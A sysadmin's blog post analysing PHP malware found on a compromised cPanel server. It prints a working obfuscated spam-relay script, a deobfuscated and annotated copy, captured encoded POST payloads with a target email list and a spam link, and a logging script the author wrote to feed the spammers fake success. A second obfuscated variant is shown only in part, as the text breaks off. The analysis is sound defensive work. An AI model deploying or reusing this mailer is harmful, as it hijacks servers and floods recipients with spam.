PHP Hacks
These are the PHP hacks I've found in the wild. I'll post the raw and the deciphered form and a quick overview of what it does.
PHP Spammer
Exim on my cPanel server has been quite busy late. Too busy actually... Looking at the queue, it was clear someone was abusing the SMTP server. Most of the messages were sent from a PHP script called newsVfK.php
. The contents of the script is given below.
<?php @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; $v1e66f6b4 = 'ma'.chr(105).'l'; if (!in_array('m'.'a'.'il', $v619d75f8)) { if ($v10497e3f) { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } else { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { echo(chr(79).chr(75).md5(1234567890)."+1\n"); continue; } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n"; } } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>
Here is the decoded version of the code above. I've replaced the random variable and function names with something more descriptive. I added a few comments throughout the code as well.
<?php
@error_reporting(0);
@ini_set("error_log", NULL);
@ini_set('log_errors', 0);
if (count($_POST) < 2) {
die(PHP_OS."10+".md5(0987654321));
}
$is_encrypted = false;
foreach (array_keys($_POST) as $value) {
// the first character of each dictionary is used
// to determine the key name.
switch ($value[0]) {
// list is the list of emails to send to
case "l": $list_name = $value; break;
// data is the message to be send
case "d": $spam_message_data = $value; break;
// mail?
case "m": $mail_server = $value; break;
// en = encrypt?
case "e"; $is_encrypted = true; break;
}
}
if ($list_name === '' || $spam_message_data === '')
die(PHP_OS."11+".md5(0987654321));
$disabled_functions = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$target_emails = @$_POST[$list_name];
$spam_message_data = @$_POST[$spam_message_data];
$mail_server = @$_POST[$mail_server];
if ($is_encrypted) {
$target_emails = decrypt_func($target_emails);
$spam_message_data = decrypt_func($spam_message_data);
$mail_server = decrypt_func($mail_server);
}
$target_emails = urldecode(stripslashes($target_emails));
$spam_message_data = urldecode(stripslashes($spam_message_data));
$mail_server = urldecode(stripslashes($mail_server));
// target_emails looks something like this:
// bkmarie@aol.com#bkmarin@aol.com#bkmark0917@aol.com#bkmark940608895@aol.com#bkmark@aol.com#bkmarks65@aol.com#bkmarkwood@aol.com#bkmarohn@aol.com#bkmars@aol.com#bkmarsch@hotmail.com#
if (strpos($target_emails, '#',1) != false) {
$email_list = preg_split('/#/', $target_emails);
$email_list_count = count($email_list);
} else {
$email_list[0] = $target_emails;
$email_list_count = 1;
}
for ($email_i=0; $email_i < $email_list_count; $email_i++) {
$target_emails = $email_list[$email_i];
if ($target_emails == '' || !strpos($target_emails,'@',1))
continue;
if (strpos($target_emails, ';', 1) != false) {
list($recipient_first_name, $recipient_last_name, $target_emails) = preg_split('/;/',strtolower($target_emails));
$recipient_first_name = ucfirst($recipient_first_name);
$recipient_last_name = ucfirst($recipient_last_name);
$target_emails_domain = next(explode('@', $target_emails));
if ($recipient_last_name == '' || $recipient_first_name == '') {
$recipient_last_name = $recipient_first_name = ''; $target_emails = $target_emails;
} else {
$target_emails = "\"$recipient_first_name $recipient_last_name\" <$target_emails>";
}
} else {
$recipient_last_name = $recipient_first_name = '';
$target_emails = strtolower($target_emails);
$target_emails_domain = next(explode('@', $target_emails));
}
/*
* the spam message will look something like this:
<USER>elma_reed</USER>
<NAME>"Elma Reed"</NAME>
<SUBJ>Fw: Hello</SUBJ>
<SBODY>
<div>
<p>
Quality Med Online Supplies best chance to save <a href="http://teatr05.ru/Video___Foto_files/rcf.html">http://teatr05.ru/Video___Foto_files/rcf.html</a>
</p>
</div>
</SBODY>
*/
preg_match('|<USER>(.*)</USER>|imsU', $spam_message_data, $sender_username);
$sender_username = $sender_username[1];
preg_match('|<NAME>(.*)</NAME>|imsU', $spam_message_data, $sender_name);
$sender_name = $sender_name[1];
preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $spam_message_data, $spam_subject);
$spam_subject = $spam_subject[1];
preg_match('|<SBODY>(.*)</SBODY>|imsU', $spam_message_data, $spam_message);
$spam_message = $spam_message[1];
$spam_subject = str_replace("%R_NAME%", $recipient_first_name, $spam_subject);
$spam_subject = str_replace("%R_LNAME%", $recipient_last_name, $spam_subject);
$spam_message = str_replace("%R_NAME%", $recipient_first_name, $spam_message);
$spam_message = str_replace("%R_LNAME%", $recipient_last_name, $spam_message);
$sender_mail_server = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
if (ne667da76($sender_mail_server) || @ini_get('safe_mode'))
$can_send_X_headers = false;
else $can_send_X_headers = true;
$sender_email = "$sender_username@$sender_mail_server";
if ($sender_name != '')
$sender_email = "$sender_name <$sender_email>";
else $sender_email = $sender_email;
$mail_header = "From: $sender_email\r\n";
$mail_header .= "Reply-To: $sender_email\r\n";
$mail_header2 = "X-Priority: 3 (Normal)\r\n";
$mail_header2 .= "MIME-Version: 1.0\r\n";
$mail_header2 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
$mail_header2 .= "Content-Transfer-Encoding: 8bit\r\n";
$mail_func = 'mail';
// If mail() is available, use it to email
if (!in_array('mail', $disabled_functions)) {
if ($can_send_X_headers) {
if (@$mail_func($target_emails, $spam_subject, $spam_message, $mail_header.$mail_header2, "-f$sender_email")) {
echo("OK".md5(1234567890)."+0\n");
continue;
}
} else {
if (@$mail_func($target_emails, $spam_subject, $spam_message, $mail_header2)) {
echo("OK".md5(1234567890)."+0\n");
continue;
}
}
}
// Use custom SMTP mailer if mail() is not available
$smtp_headers = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $mail_header;
$smtp_headers .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$sender_mail_server>\r\n";
$smtp_headers .= "To: $target_emails\r\n";
$smtp_headers .= "Subject: $spam_subject\r\n";
$smtp_headers .= $mail_header2;
$smtp_data = $smtp_headers."\r\n".$spam_message;
// If no mail server was specified from the POST request, determine one that can be used
if ($mail_server == '')
$mail_server = get_mail_server_func($target_emails_domain);
if (($mailer_func_return_code = custom_mailer_func($sender_email, $target_emails, $smtp_data, $sender_mail_server, $mail_server)) == 0) {
echo("OK".md5(1234567890)."+1\n");
continue;
} else {
echo PHP_OS."20+".md5(0987654321)."+$mailer_func_return_code\n";
}
} // end main email mailer loop
function ne667da76($server){
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $server);
}
// defined but not used
function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) {
$vf5a8e923 = strlen($vb45cffe0);
$mailer_func_return_code = '';
for($email_i = 0; $email_i < $vf5a8e923; $email_i++) {
if ($v11a95b8a >= 75) {
$v11a95b8a = $v92f21a0f;
$mailer_func_return_code .= $v7fa1b685;
}
$v4a8a08f0 = ord($vb45cffe0[$email_i]);
if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
$mailer_func_return_code.=chr($v4a8a08f0);
$v11a95b8a = 0; continue;
}
$mailer_func_return_code .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
$v11a95b8a += 3; continue;
}
$mailer_func_return_code .= chr($v4a8a08f0); $v11a95b8a++;
}
return $mailer_func_return_code;
}
// Uses fsockopen to talk to a SMTP server in order to send emails
function custom_mailer_func($sender_email, $target_emails, $smtp_data, $sender_mail_server, $mail_server) {
global $disabled_functions;
if (!in_array('fsockopen', $disabled_functions))
$socket = @fsockopen($mail_server, 25, $errno, $errstr, 20);
elseif (!in_array('pfsockopen', $disabled_functions))
$socket = @pfsockopen($mail_server, 25, $errno, $errstr, 20);
elseif (!in_array('stream_socket_client', $disabled_functions) && function_exists("stream_socket_client"))
$socket = @stream_socket_client("tcp://$mail_server:25", $errno, $errstr, 20);
else return -1;
if (!$socket) {
return 1;
} else {
$spam_message_data = dump_socket_data_func($socket);
@fputs($socket, "EHLO $sender_mail_server\r\n");
$socket_data = dump_socket_data_func($socket);
if (substr($socket_data, 0, 3) != 250 )
return "2+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data);
@fputs($socket, "MAIL FROM:<$sender_email>\r\n");
$socket_data = dump_socket_data_func($socket);
if (substr($socket_data, 0, 3) != 250 )
return "3+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data);
@fputs($socket, "RCPT TO:<$target_emails>\r\n");
$socket_data = dump_socket_data_func($socket);
if (substr($socket_data, 0, 3) != 250 && substr($socket_data, 0, 3) != 251)
return "4+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data);
@fputs($socket, "DATA\r\n"); $socket_data = dump_socket_data_func($socket);
if (substr($socket_data, 0, 3) != 354 )
return "5+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data);
@fputs($socket, $smtp_data."\r\n.\r\n");
$socket_data = dump_socket_data_func($socket);
if (substr($socket_data, 0, 3) != 250 )
return "6+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data);
@fputs($socket, "QUIT\r\n");
@fclose($socket);
return 0;
}
}
function dump_socket_data_func($socket) {
$spam_message_data = '';
while($data = @fgets($socket, 4096)) {
$spam_message_data .= $data;
if(substr($data, 3, 1) == ' ')
break;
}
return $spam_message_data;
}
function get_mail_server_func($vad5f82e8) {
global $disabled_functions;
if (!in_array('getmxrr', $disabled_functions) && function_exists("getmxrr")) {
@getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
if (count($v744fa43b) === 0)
return '127.0.0.1';
$email_i = array_keys($v6c5ea816, min($v6c5ea816));
return $v744fa43b[$email_i[0]];
} else {
return '127.0.0.1';
}
}
function decrypt_func($cyphertext) {
$cyphertext = base64_decode($cyphertext);
$text = '';
for($i = 0; $i < strlen($cyphertext); $i++)
$text .= chr(ord($cyphertext[$i]) ^ 2);
return $text;
}
?>
I also captured the POST values that are being sent to the script:
208.43.56.34Array
(
[list] => YGlvY3BrZ0JjbW4sYW1vIWBpb2Nwa2xCY21uLGFtbyFgaW9jcGkyOzM1QmNtbixhbW8hYGlvY3BpOzYyNDI6Ojs3QmNtbixhbW8hYGlvY3BpQmNtbixhbW8hYGlvY3BpcTQ3QmNtbixhbW8hYGlvY3BpdW1tZkJjbW4sYW1vIWBpb2NwbWpsQmNtbixhbW8hYGlvY3BxQmNtbixhbW8hYGlvY3BxYWpCam12b2NrbixhbW8h
[data] => PldRR1A8Z25vY11wZ2dmPi1XUUdQPAg+TENPRzwgR25vYyJQZ2dmID4tTENPRzwIPlFXQEg8RHU4IiJKZ25ubT4tUVdASDwIPlFATUZbPAg+Zmt0PAg+cjwIIlN3Y25rdnsiT2dmIk1sbmtsZyJRd3JybmtncSJgZ3F2ImFqY2xhZyJ2bSJxY3RnIj5jImpwZ2Q/IGp2dnI4LS12Z2N2cDI3LHB3LVRrZmdtXV1dRG12bV1ka25ncS1wYWQsanZvbiA8anZ2cjgtLXZnY3ZwMjcscHctVGtmZ21dXV1EbXZtXWRrbmdxLXBhZCxqdm9uPi1jPAg+LXI8CD4tZmt0PAg+LVFATUZbPA==
[en] => 1
)
list
is the list of emails to spam. data
contains the actual spam data including the sender name, subject, and the spam message. There is a special 'decryption' function in the code that does a few transformations on the text that's given as to obfuscate what's actually going on.
Interestingly, this page appears to be hit by random servers, possibly servers that have been hijacked. There were a few hundred unique IPs hitting this script. Unfortunately, I couldn't find anything else on the compromised account which propagates these POST requests to other servers.
Just for fun, I've made a script to gather the data being sent while giving the spammers false feedback that the script is still working:
<?php
// log data
ob_start();
echo $_SERVER['REMOTE_ADDR'];
print_r($_POST);
$data = ob_get_contents();
ob_clean();
// save it to /tmp
$fp = fopen("/tmp/postdata", "a+");
fwrite($fp, $data);
fclose($fp);
// give them fake return statuses
$emails = decrypt_func(@$_POST['list']);
$email_count = count(explode("#", $emails));
for ($i = 0; $i < $email_count; $i++) {
echo("O"."K".md5(1234567890)."+1\n");
}
function decrypt_func($cyphertext) {
$cyphertext = base64_decode($cyphertext);
$text = '';
for($i = 0; $i < strlen($cyphertext); $i++)
$text .= chr(ord($cyphertext[$i]) ^ 2);
return $text;
}
We'll see how long this keeps on going...
Update: It appears that this is part of a botnet. See http://blog.trendmicro.com/trendlabs-security-intelligence/how-to-check-if-your-website-is-part-of-the-stealrat-botnet/
PHP Spammer v2.0
There appears to be a slightly more sophisticated version from the same botnet. It uses the same encoding and API to send mail, but utilizes sockets before falling back to using the system's mail() call.
The original obfuscated PHP code and the deobfuscated code can be seen below:
$r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = $r76[27].$r76[49].$r76[58].$r76[66].$r76[87].$r76[90].$r76[58].$r76[87]; $GLOBALS['nhnww15'] = $r76[58].$r76[41].$r76[45].$r76[7].$r76[53].$r76[23].$r76[76]; $GLOBALS['igajs32'] = $r76[41].$r76[49].$r76[87].$r76[27].$r76[27].$r76[76].$r76[76]; $GLOBALS['cpukq94'] = $r76[49].$r76[78].$r76[90].$r76[45].$r76[7].$r76[18].$r76[14]; $GLOBALS['bdonk12'] = $r76[36].$r76[43].$r76[61].$r76[96].$r76[49].$r76[18].$r76[18]; $GLOBALS['aurku4'] = $r76[53].$r76[49].$r76[20].$r76[61].$r76[49].$r76[46].$r76[15]; $GLOBALS['yqqkt30'] = $r76[7].$r76[45].$r76[58].$r76[27].$r76[87].$r76[53].$r76[49].$r76[58].$r76[54].$r76[94].$r76[20].$r76[53].$r76[66].$r76[87].$r76[66]; $GLOBALS['tnmsd36'] = $r76[78].$r76[90].$r76[53].$r76[5]; $GLOBALS['chqql44'] = $r76[90].$r76[24].$r76[78].$r76[87].$r76[20].$r76[31].$r76[46]; $GLOBALS['cvtxr40'] = $r76[94].$r76[27].$r76[69].$r76[43].$r76[66].$r76[31].$r76[52]; $GLOBALS['eavur97'] = $r76[45].$r76[66].$r76[5].$r76[94].$r76[94].$r76[41]; $GLOBALS['ptlaz26'] = $r76[45].$r76[24].$r76[70].$r76[7].$r76[45].$r76[14].$r76[18]; $GLOBALS['xcnkh30'] = $r76[20].$r76[5].$r76[5].$r76[94].$r76[35].$r76[52]; $GLOBALS['wnlxd28'] = $r76[87].$r76[24].$r76[53].$r76[78]; $GLOBALS['laepm94'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['nxseo15'] = $r76[61].$r76[94].$r76[87].$r76[36].$r76[49].$r76[66].$r76[87].$r76[96].$r76[69].$r76[58].$r76[90].$r76[78].$r76[94]; $GLOBALS['cyzbs96'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36]; $GLOBALS['yoejz48'] = $r76[24].$r76[35].$r76[94].$r76[29].$r76[61].$r76[31].$r76[15]; $GLOBALS['lzjpr73'] = $r76[43].$r76[95].$r76[87].$r76[47].$r76[7].$r76[23].$r76[18]; $GLOBALS['osnjl91'] = $r76[24].$r76[20].$r76[24].$r76[78].$r76[41].$r76[14].$r76[52]; $GLOBALS['zhjzv93'] = $r76[41].$r76[24].$r76[27].$r76[45].$r76[20].$r76[85].$r76[14]; $GLOBALS['brkww19'] = $r76[66].$r76[87].$r76[24].$r76[5].$r76[94].$r76[58]; $GLOBALS['yhcum29'] = $r76[49].$r76[69].$r76[69].$r76[66].$r76[61].$r76[18].$r76[52]; $GLOBALS['ibere91'] = $r76[7].$r76[49].$r76[7].$r76[87].$r76[61].$r76[46].$r76[14]; $GLOBALS['vszxc90'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[29].$r76[94].$r76[69].$r76[66]; $GLOBALS['qtgcq90'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[5].$r76[94].$r76[27].$r76[87]; $GLOBALS['bwpvf88'] = $r76[45].$r76[27].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]; $GLOBALS['bdvxl14'] = $r76[66].$r76[87].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['xizmx47'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[61].$r76[94].$r76[87]; $GLOBALS['stkuy98'] = $r76[70].$r76[29].$r76[90].$r76[84].$r76[84].$r76[15].$r76[18]; $GLOBALS['duiid33'] = $r76[95].$r76[90].$r76[87].$r76[94]; $GLOBALS['grxdw62'] = $r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24]; $GLOBALS['nvuxa92'] = $r76[69].$r76[96].$r76[94].$r76[43].$r76[69].$r76[18].$r76[18]; $GLOBALS['ysmvf63'] = $r76[78].$r76[53].$r76[58]; $GLOBALS['vbhwy58'] = ${$r76[54].$r76[3].$r76[17].$r76[55].$r76[67]}; $GLOBALS['wdbfr89'] = $r76[7].$r76[94].$r76[43].$r76[7].$r76[20].$r76[85].$r76[52]; $GLOBALS['vxogc32'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[66].$r76[41].$r76[5].$r76[53].$r76[87]; $GLOBALS['inenw32'] = $r76[20].$r76[43].$r76[66].$r76[94].$r76[66].$r76[46].$r76[85]; $GLOBALS['xyxdn38'] = $r76[27].$r76[36].$r76[24]; $GLOBALS['rtdlc97'] = $r76[49].$r76[24].$r76[95]; $GLOBALS['cnrfe78'] = $r76[45].$r76[24].$r76[5].$r76[95].$r76[94].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['wzekj92'] = $r76[66].$r76[87].$r76[24].$r76[53].$r76[41].$r76[66].$r76[5].$r76[90].$r76[66].$r76[36].$r76[94].$r76[66]; $GLOBALS['yrqxp89'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[7].$r76[5].$r76[53].$r76[41]; $GLOBALS['xavtv19'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36].$r76[54].$r76[90].$r76[5].$r76[5]; $GLOBALS['zjheh80'] = $r76[96].$r76[90].$r76[66].$r76[94].$r76[23].$r76[85].$r76[54].$r76[94].$r76[58].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['gisxn89'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]; $GLOBALS['oqikt29'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[5].$r76[90].$r76[66].$r76[87].$r76[54].$r76[94].$r76[24].$r76[24].$r76[49].$r76[24]; $GLOBALS['tvxvt28'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[87].$r76[24].$r76[94].$r76[24].$r76[24].$r76[49].$r76[24]; $GLOBALS['fmlld76'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[49].$r76[41].$r76[87].$r76[53].$r76[49].$r76[58]; $GLOBALS['zwafy86'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[58].$r76[49].$r76[58].$r76[96].$r76[5].$r76[49].$r76[27].$r76[29]; $GLOBALS['uocvp26'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[49].$r76[58].$r76[58].$r76[94].$r76[27].$r76[87]; $GLOBALS['xvxof76'] = 